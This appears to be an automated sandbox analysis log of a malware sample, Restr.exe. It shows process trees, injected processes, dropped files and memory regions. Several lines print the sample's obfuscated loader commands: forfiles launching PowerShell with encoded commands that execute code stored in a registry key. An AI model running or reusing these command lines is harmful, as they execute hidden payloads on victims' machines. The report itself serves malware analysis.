PID 4760 wrote to memory of 2500 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2500 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 856 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 856 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 856 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3212 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3212 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3212 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4152 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4152 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4152 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 1148 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 1148 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 1148 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2448 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2448 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2448 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4460 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4460 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4460 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3216 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3216 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3216 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3616 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3616 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3616 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2372 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2372 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2372 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1412 wrote to memory of 4952 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1412 wrote to memory of 4952 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 4952 wrote to memory of 2956 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 2956 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 3716 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 3716 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 228 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 228 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 988 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4624 wrote to memory of 988 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 988 wrote to memory of 4764 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 988 wrote to memory of 4764 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4624 wrote to memory of 4468 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4624 wrote to memory of 4468 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4468 wrote to memory of 3232 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4624 wrote to memory of 2996 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4104 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe C:\Windows\Explorer.EXE

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Restr.exe

"C:\Users\Admin\AppData\Local\Temp\Restr.exe"

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:17410 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82950 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82954 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82958 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82962 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82966 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82970 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:17412 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:17414 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82978 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82982 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ghia3nh3\ghia3nh3.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2FA4.tmp" "c:\Users\Admin\AppData\Local\Temp\ghia3nh3\CSC27BEC1645D2B4DB4B060ACD19CF88B1.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\15u10d5z\15u10d5z.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES312A.tmp" "c:\Users\Admin\AppData\Local\Temp\15u10d5z\CSCF125F687492A430B9A63A17B8B80657.TMP"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4104 -ip 4104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 684

Network


Files

memory/4104-134-0x000000000042E000-0x000000000043A000-memory.dmp

memory/4104-135-0x000000000042E000-0x000000000043A000-memory.dmp

memory/4104-136-0x00000000005B0000-0x00000000005BC000-memory.dmp

memory/4104-137-0x0000000001000000-0x000000000106F000-memory.dmp

memory/4104-138-0x0000000000D30000-0x0000000000D40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\2psodd8\imagestore.dat

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GGB3KH7Z\favicon[2].ico

memory/4624-148-0x0000023D2A4D0000-0x0000023D2A4F2000-memory.dmp

memory/4624-149-0x0000023D11640000-0x0000023D12101000-memory.dmp

memory/4624-151-0x0000023D2A5A0000-0x0000023D2A5A2000-memory.dmp

memory/3716-150-0x000001EA1DD30000-0x000001EA1E7F1000-memory.dmp

memory/4624-153-0x0000023D2A5A6000-0x0000023D2A5A8000-memory.dmp

memory/3716-155-0x000001EA1BE33000-0x000001EA1BE35000-memory.dmp

memory/3716-154-0x000001EA1BE30000-0x000001EA1BE32000-memory.dmp

memory/4624-152-0x0000023D2A5A3000-0x0000023D2A5A5000-memory.dmp

memory/3716-156-0x000001EA1BE36000-0x000001EA1BE38000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

memory/228-159-0x0000024E2ABD0000-0x0000024E2B691000-memory.dmp

memory/228-160-0x0000024E2B6A0000-0x0000024E2B75D000-memory.dmp

memory/228-161-0x0000024E2B6A0000-0x0000024E2B75D000-memory.dmp

memory/228-162-0x0000024E2B6A0000-0x0000024E2B75D000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ghia3nh3\ghia3nh3.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\ghia3nh3\ghia3nh3.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\ghia3nh3\CSC27BEC1645D2B4DB4B060ACD19CF88B1.TMP

C:\Users\Admin\AppData\Local\Temp\RES2FA4.tmp

C:\Users\Admin\AppData\Local\Temp\ghia3nh3\ghia3nh3.dll

\??\c:\Users\Admin\AppData\Local\Temp\15u10d5z\15u10d5z.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\15u10d5z\15u10d5z.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\15u10d5z\CSCF125F687492A430B9A63A17B8B80657.TMP

C:\Users\Admin\AppData\Local\Temp\RES312A.tmp

C:\Users\Admin\AppData\Local\Temp\15u10d5z\15u10d5z.dll

memory/4624-173-0x0000023D2A560000-0x0000023D2A573000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

memory/4104-175-0x00000000001C0000-0x00000000001CE000-memory.dmp

memory/2996-176-0x00000000015B0000-0x00000000015C5000-memory.dmp

memory/2996-177-0x0000000001590000-0x00000000015A5000-memory.dmp